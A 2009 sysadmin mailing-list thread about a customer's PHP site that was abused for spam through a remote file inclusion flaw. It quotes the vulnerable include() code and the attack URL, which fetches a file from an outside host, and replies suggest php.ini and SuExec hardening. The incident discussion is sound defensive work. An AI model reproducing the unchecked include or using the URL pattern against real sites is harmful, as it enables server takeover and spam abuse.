Hey Mike First thing to remember: never get nervous about a spammer! There are too many out there. It's just not worth your time to get angry about such things... It was our choice to get sysadmins - spamfighting is one of our big daily tasks. We might as well work for McDonalds - there's spam too.
Turning off allow_url_fopen & CURL might give you some headaches about customers that definitely need the option to fetch remote data. So here's my recommended setup (allow_url_include was introduced in PHP 5.2.0): allow_url_fopen = On allow_url_include = Off This will prevent you from the most stupid spammers, at least. Next, work on some secure PHP setup, say: running PHP as CGI with Apache's SuExec. You should also throttle emails sent by PHP, e.g. with a simple sendmail wrapper: http://www.iezzi.ch/archives/258 http://www.iezzi.ch/archives/217 Regards, Philip -- Onlime Webhosting Wachterweg 21 CH-8057 Zürich phone +41 44 508 0702 skype ondalime [email protected] - http://www.onlime.ch On 19.02.2009, at 16:46, Mike Kellenberger wrote: > totally correct, thanks! Looks like I'm the stupid SysAdmin as > well... :-) > > Regards, > > Mike > > -- > Mike Kellenberger [email protected] > Escapenet - the Web Company Tel +41 52 235 0700 > http://www.escapenet.ch Skype mikek70atwork > > > -----Ursprüngliche Nachricht----- > Von: [email protected] [mailto:[email protected] > ] Im Auftrag von Radek Mrskos > Gesendet: Donnerstag, 19. Februar 2009 16:41 > An: Mike Kellenberger > Cc: [email protected] > Betreff: Re: [swinog] F*ing Spammers and stupid customer code... > > I think, this is what you should have anyway in your php.ini > > > allow_url_fopen = Off > > /Radek > Am 19.02.2009 um 16:31 schrieb Mike Kellenberger: > >> Hi all >> >> Just stopped our mail server from spitting out thousands of spam >> messages. >> >> We have a customer who has a site with the following (stupid) code in >> his index.php: >> >> if($called_page_link!="") >> { >> $requested_file=$called_page_link; >> } >> >> include($requested_file); >> >> >> The f*ing spammer found out about this and called the page with: >> >> http://www.thestupidcustomer.xy/index.php?called_page_link=http://geocit >> ies.com/nimiuu/fuck.txt? >> >> >> Boom. >> >> Have I already told you that I hate spammers? :-) >> >> Oh well, one down - a few million to go... >> >> >> Regards, >> >> Mike >> >> -- >> Mike Kellenberger [email protected] >> Escapenet - the Web Company Tel +41 52 235 0700 >> http://www.escapenet.ch Skype mikek70atwork >> >> >> _______________________________________________ >> swinog mailing list >> [email protected] >> http://lists.swinog.ch/cgi-bin/mailman/listinfo/swinog > > Mit freundlichen Grüssen > > Radek Mrskos Email: [email protected] > Baechlerstr. 12 Tel: +41 43 534 40 24 > CH-8802 Kilchberg Mob: +41 79 219 68 66 > PGP:0x8CB69F6D Fax: +41 86079 2196 866 > > _______________________________________________ > swinog mailing list > [email protected] > http://lists.swinog.ch/cgi-bin/mailman/listinfo/swinog > _______________________________________________ > swinog mailing list > [email protected] > http://lists.swinog.ch/cgi-bin/mailman/listinfo/swinog _______________________________________________ swinog mailing list [email protected] http://lists.swinog.ch/cgi-bin/mailman/listinfo/swinog
